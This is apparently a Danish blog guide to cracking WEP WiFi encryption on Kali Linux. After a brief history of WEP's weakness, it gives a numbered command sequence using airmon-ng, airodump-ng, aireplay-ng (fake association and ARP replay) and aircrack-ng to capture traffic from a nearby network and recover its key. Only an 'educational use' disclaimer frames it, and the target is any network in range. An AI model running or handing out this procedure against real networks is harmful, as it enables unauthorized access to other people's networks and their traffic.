Cyber Security guide – cracking WEP med Linux

WEP cracking er en enkryptering som helst ikke skulle bruges af nogen, men desværre ser man stadigvæk en del som gør det.  Privatpersoner har en tendens til at vælge hvad ens WIFI router er præ-konfigureret med, i mange tilfælde er dette WPA2 hvilket er helt fint. Men at vælge WEP som den sikre løsning, er ikke helt så sikkert som mange tror.

Denne guide går ikke i detaljerne med WEP cracking, men giver dig et overordnet billede af hvad du skal gøre og hvilke værktøjer der benyttes.  En video kan findes i bunden på siden som viser hvordan man cracker WEP fra a-z.

Lidt om WEP enkryptering

Wired Equivalent Privacy (WEP) er en let brudt sikkerhed algoritme til IEEE 802.11-trådløse netværk. Indført som en del af den oprindelige 802.11-standard.

I august 2001 offentliggjore Scott Fluhrer, Itsik Mantin, og Adi Shamir en kryptoanalyse af WEP, hvilket resulterer i et passiv angreb, der kan gendanne netværksnøglen efter aflytning på netværket.

Afhængigt af mængden af netværkstrafik, og dermed antallet af pakker til rådighed til inspektion, kan en vellykket nøglegendannelse tage så lidt som et minut.

Cracking WEP

Når man skal cracke WEP encryptering kan man benytte et hav af forskellige værktøjer, men det eneste rigtige er Linux og gerne enten distributionerne BackTrack eller Kali.  Kali benyttes i denne guide.

Her er hvad vi skal gøre i store træk:

  1. Benytter airodump-ng for at se hvilke WIFI netværk der er i området
  2. Vælger et WIFI og får airodump-ng til at optage trafikken (eg. optage som i at optage fra TV)
  3. Benytter aireplay-ng til at få Association/Autentificering (at WIFI extern router godkender os)
  4. Fremprovoker traffik til at optage
  5. Benytte aircrack-ng til at cracke passwordet

Her er de kommandoer du skal udføre step by step:

  1. airmon-ng
  2. airodump-ng (interface)
  3. airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)
  4. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
  5. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
  6. aircrack-ng -b (bssid) (file name-01.cap)

Forklaring til (****).

  • (interface)
    • Det er det interface som du kunstigt frembringer
  • (channel)
    • Den kanal som det WIFI netværk ligger på som vi vil cracke
  • (file name)
    • Det er dit eget valg, så vælg noget sigende du kan finde og huske
  • (bssid)
    • Den identifikation som den WIFI router har vi vil cracke
  • (file name-01.cap)
    • Det var (file name).cap

Det kan godt tage lidt tid at få alt den traffik som vi har brug for.  Normalt tager det ikke mere end 15 minutter, men alt afhængig af forstyrrelser og rækkevidde kan det tage længere tid.  Når alt kommer til alt er det jo et spørgsmål om hvor kraftig en WIFI adapter man har.

Video og link er her:

Online ressource:

http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack

Ansvarsfraskrivelse!
Jeg vil på inden måde stå til ansvar for hvad denne guide bliver brugt til.  Materialerne er kun til undervisningsbrug.  Brug disse materialer med omtanke!